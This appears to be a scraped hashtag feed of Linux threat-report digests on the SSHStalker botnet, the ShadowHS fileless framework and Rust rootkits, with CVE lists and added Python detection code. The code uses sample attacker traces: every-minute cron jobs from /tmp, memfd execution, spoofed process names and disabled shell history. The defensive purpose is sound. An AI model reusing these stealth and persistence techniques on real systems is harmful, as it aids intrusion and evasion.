CVE-2009-2698 \[[Vulners](vulners.com/cve/CVE-2009-269…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.19)
CVE-2009-2908 \[[Vulners](vulners.com/cve/CVE-2009-290…)] - CVSS V3.1: *4.9*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (2.6.31)
CVE-2010-2959 \[[Vulners](vulners.com/cve/CVE-2010-295…)] - CVSS V3.1: *7.2*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.27.53, <2.6.32.21, <2.6.34.6, <2.6.35.4)
CVE-2010-3849 \[[Vulners](vulners.com/cve/CVE-2010-384…)] - CVSS V3.1: *4.7*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.36.2)
CVE-2010-1173 \[[Vulners](vulners.com/cve/CVE-2010-117…)] - CVSS V3.1: *7.1*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (le2.6.33.3, 2.6.0, 2.6.1, 2.6.2, 2.6.3)
CVE-2009-3547 \[[Vulners](vulners.com/cve/CVE-2009-354…)] - CVSS V3.1: *7.0*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (le2.6.31.14, 2.6.32)
CVE-2010-3437 \[[Vulners](vulners.com/cve/CVE-2010-343…)] - CVSS V3.1: *6.6*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.36)
📚TTPs: ⚔️Tactics: 3 🛠️Technics: 0
🤖LLM extracted TTPs: T1027, T1036, T1036.005, T1046, T1053.003, T1059, T1059.004, T1068, T1070.002, T1078, ...
🧨IOCs: - IP: 8 - Coin: 2 - Hash: 23
💽Software: Linux, Ubuntu
🪙Crypto: ethereum
🔢Algorithms: zip, md5
📜Programming Languages: python, perl, golang
💻Platforms: cross-platform, arm, x86, x64

#threatreport: The SSHStalker botnet represents a resurgence of traditional Internet Relay Chat (IRC) mechanisms, using multiple bot variants and leveraging older Linux exploitation techniques. This botnet employs a command-and-control (C2) infrastructure that emphasizes redundancy and cost-effectiveness, facilitating mass SSH compromises. The operational methodology consists of an automated pipeline that integrates SSH scanning mechanisms that resemble the functionality of "nmap," ultimately connecting compromised systems to IRC channels for command execution. Upon successful intrusion, SSHStalker deploys two C-based bot variants that differ minimally, targeting a range of hardware architectures including ARM and x86. These bots facilitate communication with designated IRC servers to receive commands. The botnet's persistence framework relies on cron jobs that execute every minute, allowing it to resurface quickly even after attempts to disable it. The underlying toolkit features both rootkit capabilities and log-cleaning functions, aimed at maintaining stealth and covering its tracks, while utilizing a collection of legacy Linux kernel exploits from around 2009-2010 that remain effective against outdated systems. The botnet's architecture is notable for its similarities to existing Romanian-linked botnet operations—design, execution logic, and IRC enlisting strategies echo those seen in past campaigns—but it lacks definitive attribution to any specific threat actor.

Intrusion analysis indicates the threat actor's operations center around exploiting vulnerabilities within legacy Linux distributions, enriched with a variety of tools designed for privilege escalation and continuous access. The SSHStalker’s ecosystem further extends to illicit cryptocurrency mining activities, suggesting a financial incentive behind its deployment. Scanning operations have already uncovered approximately 7,000 compromised SSH targets, primarily within cloud infrastructures. Additionally, tools aimed at harvesting sensitive information from misconfigured web applications reinforce its operational scale and effectiveness. With regard to detection and mitigation, it is crucial for network defenders to remain vigilant. Suggested strategies include monitoring for unusual executions of compilation tools, alerting on rapid execution of newly compiled binaries, scrutinizing cron job activities, and observing TCP connection patterns that exhibit unusual persistence. Regular audits on user account modifications, especially concerning privileged users and SSH keys, alongside monitoring for atypical accesses to system log files, can fortify defenses against potential intrusions linked to this evolving threat landscape.
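Two of the detection strategies suggested in the SSHStalker summary above (rapid execution of newly compiled binaries, and every-minute cron persistence) as working checks. This is an added example, not code from the report or the feed; the log shape, paths and crontab lines are constructed, not real auditd output or real indicators.

```python
from datetime import datetime

# Constructed execve-style log (simplified "time user exe argv..." shape, not real
# auditd output) showing a compiler run followed seconds later by its output.
SAMPLE_EXEC_LOG = """\
2025-12-01T10:00:01 www-data /usr/bin/gcc gcc -o /tmp/.x/exp exp.c
2025-12-01T10:00:04 www-data /tmp/.x/exp /tmp/.x/exp
2025-12-01T10:05:00 root /usr/bin/gcc gcc -o /opt/app/build/server main.c
2025-12-01T13:00:00 root /opt/app/build/server /opt/app/build/server
"""
COMPILERS = {"gcc", "cc", "g++", "clang", "tcc"}

def parse_exec_log(text):
    """Yield (time, user, exe, argv) from the constructed log shape."""
    for line in text.splitlines():
        ts, user, exe, *argv = line.split()
        yield datetime.fromisoformat(ts), user, exe, argv

def compile_then_run(text, window_seconds=120):
    """Flag binaries executed within window_seconds of being built (`-o path`)
    on the same host; returns [(user, path, seconds_since_build), ...]."""
    pending, hits = {}, []  # pending: output path -> (build time, user)
    for ts, user, exe, argv in parse_exec_log(text):
        if argv and argv[0].rsplit("/", 1)[-1] in COMPILERS and "-o" in argv[:-1]:
            pending[argv[argv.index("-o") + 1]] = (ts, user)
        elif exe in pending:
            built_at, _ = pending.pop(exe)
            delta = (ts - built_at).total_seconds()
            if delta <= window_seconds:
                hits.append((user, exe, delta))
    return hits

# Constructed crontab: an every-minute job (the persistence pattern) next to a benign one.
SAMPLE_CRONTAB = """\
* * * * * /tmp/.x/run.sh >/dev/null 2>&1
0 2 * * * /usr/bin/certbot renew
"""

def every_minute_jobs(crontab_text):
    """Return the commands whose five schedule fields are all '*'."""
    jobs = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) == 6 and all(f == "*" for f in fields[:5]):
            jobs.append(fields[5])
    return jobs

if __name__ == "__main__":
    print(compile_then_run(SAMPLE_EXEC_LOG))  # [('www-data', '/tmp/.x/exp', 3.0)]
    print(every_minute_jobs(SAMPLE_CRONTAB))  # ['/tmp/.x/run.sh >/dev/null 2>&1']
```

The nightly build in the sample is not flagged because three hours pass before it runs; tune the window to the host's normal build-and-deploy cadence before alerting on it.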
The economics of #AI-assisted development just changed dramatically. Chris Mason's new task-based review framework demonstrates that intelligent prompt architecture matters as much as model selection. Read more: 👉 tinyurl.com/4dn44zvx #Linux_Kernel
#threatreport #HighCompleteness ShadowHS: A Fileless Linux Post-Exploitation Framework Built on a Weaponized hackshell | 30-01-2026 Source: cyble.com/blog/shadowhs-file… Key details below ↓ 💀Threats: Shadowhs_tool, Hackshell_tool, Credential_harvesting_technique, Rondodox, Kinsing_miner, Xmrig_miner, Ebury, Credential_stealing_technique, Gminer, Lolminer, Gsocket_tool, Gs-netcat, Rustscan_tool, Dirty_pipe_vuln, 🎯Victims: Enterprise environments, Cloud hosted linux environments 🏭Industry: Ics 🔓CVEs: CVE-2025-21756 \[[Vulners](vulners.com/cve/CVE-2025-217…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<5.10.235, <5.15.179, <6.1.131, <6.6.79, <6.12.16) 📚TTPs: ⚔️Tactics: 9 🛠️Technics: 1 🧨IOCs: - Coin: 3 - IP: 5 - Domain: 3 - File: 1 - Hash: 26 💽Software: Linux, OpenSSL, Microsoft Defender, OpenSSH, AppArmor, Bitrix, WordPress, Docker, rsync 🔢Algorithms: exhibit, aes-256-cbc, base64, sha256, gzip, kawpow 🔠Functions: _once, gpu, rs, rs1 🗂️Win API: decompress 📜Programming Languages: perl, golang #threatreport: Cyble Research & Intelligence Labs has uncovered a sophisticated Linux intrusion framework known as ShadowHS, which leverages a fileless loader and a weaponized variant of hackshell for post-exploitation activities. This framework is notable for its emphasis on stealth and operator-controlled interactions, distinguishing it from conventional Linux malware that focuses on rapid propagation or monetization. ShadowHS executes entirely from memory, utilizing techniques such as anonymous file descriptors, argv[0] spoofing, and the avoidance of persistent file artifacts, making detection and forensic analysis significantly more challenging. The primary component of the framework is a multi-stage, encrypted shell loader that facilitates payload decryption, reconstruction, and execution without writing files to the disk. 
Once deployed, the payload operates in memory and is capable of downloading additional malicious components like kernel exploits or cryptominers when required. This operational design focuses heavily on environmental awareness and security control discovery, ensuring that adversaries can maintain a low profile within enterprise environments. Internally, the framework features dormant functionalities that can be activated, including credential access, lateral movement, and resource hijacking, providing flexibility based on the operator's objectives. The stealth capabilities are bolstered by mechanisms that disable shell histories, obscure command artifacts, and relocate temporary files, thus minimizing the traces left on compromised systems. Furthermore, the payload is built to detect and evade endpoint detection and antivirus solutions, enabling operators to continue utilizing the compromised infrastructure without interference. In essence, the operator-centric nature of ShadowHS, along with its sophisticated evasion tactics and ability to perform reconnaissance, aligns more closely with advanced intrusion frameworks or red-teaming tools rather than more generic Linux malware. As it actively checks for cloud agents and monitoring tools in cloud-hosted environments, its capabilities are tailored to operate effectively in defended networks. The advanced tradecraft illustrated indicates a high level of strategic planning by threat actors seeking prolonged access and control over targeted systems.
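The three host-side traces the ShadowHS summary above names (anonymous memfd execution, argv[0] spoofing, disabled shell history) can each be checked from /proc; the following is an added example, not code from Cyble or the feed. The process records are constructed to illustrate the shape of /proc data, and the names, paths and pids in them are hypothetical.

```python
import os

# Constructed process records mirroring what /proc/<pid>/{exe,comm,cmdline,environ}
# expose; illustrative only, not captured from a real ShadowHS host.
SAMPLE_PROCS = [
    {"pid": 1042, "exe": "/usr/sbin/sshd", "comm": "sshd",
     "argv0": "/usr/sbin/sshd", "env": {"HISTFILE": "/root/.bash_history"}},
    {"pid": 2231, "exe": "/memfd:payload (deleted)", "comm": "payload",
     "argv0": "[kthreadd]", "env": {"HISTFILE": "/dev/null", "HISTSIZE": "0"}},
    {"pid": 2290, "exe": "/tmp/.c/x (deleted)", "comm": "x",
     "argv0": "/tmp/.c/x", "env": {"HISTFILE": "/dev/null"}},
]

def assess(proc):
    """Return the indicators one record trips: memfd or unlinked executable,
    argv[0] disagreeing with the kernel's comm, and shell history disabled."""
    findings = []
    exe, comm, argv0, env = proc["exe"], proc["comm"], proc["argv0"], proc["env"]
    if exe.startswith("/memfd:"):
        findings.append("exe is an anonymous memfd (fileless execution)")
    elif exe.endswith(" (deleted)"):
        findings.append("exe unlinked from disk after exec")
    # argv[0] is fully caller controlled; comm is set by the kernel at execve
    # (15 chars max), so a mismatch between them is the spoofing signal.
    claimed = argv0.strip("[]").rsplit("/", 1)[-1][:15]
    if claimed != comm[:15]:
        findings.append(f"argv[0] claims {claimed!r} but comm is {comm!r}")
    if env.get("HISTFILE") in ("", "/dev/null") or env.get("HISTSIZE") == "0":
        findings.append("shell history disabled via environment")
    return findings

def read_proc(pid):
    """Build the same record shape from a live /proc entry (Linux only; other users' processes need root)."""
    base = f"/proc/{pid}"
    with open(f"{base}/comm") as fh: comm = fh.read().strip()
    with open(f"{base}/cmdline", "rb") as fh: argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
    with open(f"{base}/environ", "rb") as fh:
        pairs = (kv.split(b"=", 1) for kv in fh.read().split(b"\0") if b"=" in kv)
        env = {k.decode(): v.decode(errors="replace") for k, v in pairs}
    return {"pid": pid, "exe": os.readlink(f"{base}/exe"), "comm": comm,
            "argv0": argv0, "env": env}

if __name__ == "__main__":  # live scan of this host; skips processes that exit or are unreadable
    for p in filter(str.isdigit, os.listdir("/proc")):
        try:
            hits = assess(read_proc(int(p)))
        except OSError:
            continue
        if hits: print(p, hits)
```

Daemons that legitimately rewrite their own argv[0] (sshd's "sshd: ... [listener]" status line, postgres workers) will trip the argv check and belong on an allowlist; the memfd and unlinked-exe checks are the higher-fidelity signals.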
3 Dec 2025
#threatreport #MediumCompleteness Snake Rustamania | 02-12-2025 Source: rt-solar.ru/solar-4rays/blog… Key details below ↓ 🧑‍💻Actors/Campaigns: Shedding_zmiy Overload 💀Threats: Kitsune, Octopus, Leech, Pwnkit_tool, Bulldog_backdoor, 🔓CVEs: CVE-2023-4911 \[[Vulners](vulners.com/cve/CVE-2023-491…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - gnu glibc (<2.39) CVE-2022-2588 \[[Vulners](vulners.com/cve/CVE-2022-258…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<4.9.326, <4.14.291, <4.19.256, <5.4.211, <5.10.137) CVE-2021-3156 \[[Vulners](vulners.com/cve/CVE-2021-315…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - sudo_project sudo (<1.8.32, <1.9.5) CVE-2021-4034 \[[Vulners](vulners.com/cve/CVE-2021-403…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - polkit_project polkit (<121) 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🧨IOCs: - File: 4 - Hash: 11 💽Software: Telegram, Linux, Mycelium, selinux, Debian, Ubuntu, nginx, sudo, mariadb, unix, ... 🔢Algorithms: sha1, sha256, crc-32, xor, base64, md5 🔠Functions: sentmsg, getMyceliumProxyConn 📜Programming Languages: php, ruby, perl, python, rust #threatreport: In March 2023, an article highlighted the emergence of new tools under the name Shedding Zmiy, which unveiled the Puma and Kitsune rootkits along with various other utilities developed in Rust. These tools are designed to assist attackers in establishing initial access to systems and maintaining persistence post-exploit. The article delves into the techniques employed by these Rust-based malware components, emphasizing their operational interplay. The sophisticated nature of their design allows for enhanced stealth and effectiveness during cyber attacks. The technical interactions between Puma and Kitsune, as well as the additional utilities, showcase the potential for these tools to be leveraged by threat actors to navigate and manipulate targeted environments successfully. 
The increasing use of Rust indicates a shift towards languages that enable the creation of efficient and low-level system utilities, suggesting a trend in the evolution of malware development practices. Such advancements pose significant risks, as the combination of these rootkits and associated tools can enable attackers to circumvent traditional security measures, gaining deeper and more lasting access to compromised systems. The technical assessment of these malware types highlights the necessity for ongoing vigilance and adaptation in cybersecurity strategies to address the growing sophistication of cyber threats.
15 Oct 2025
It seems Epic's account-related API is running linux_kernel 2.6.18 as its OS. If that thing that lets a local user get root privileges is still there, I'd think that's bad, but I wonder how it actually is.
4 Oct 2025
GOING LINUX MODE🐧 I used to think Linux was some cheap copy of Windows because of its logo in 10th. 😭 (I regret it, I'll kill the past me.) Yeah, I know Ubuntu is for kids, I'll reach Arch in a month or 2 maybe 💀 (running it on WSL) #linux_kernel #Ubuntu
And on the #Linux_Kernel: "In today's #hyperconnected world, #SystemOutages [...] are a #business #catastrophe. Linux kernel live patching is a way to apply #critical and important #SecurityPatches to a running #LinuxKernel"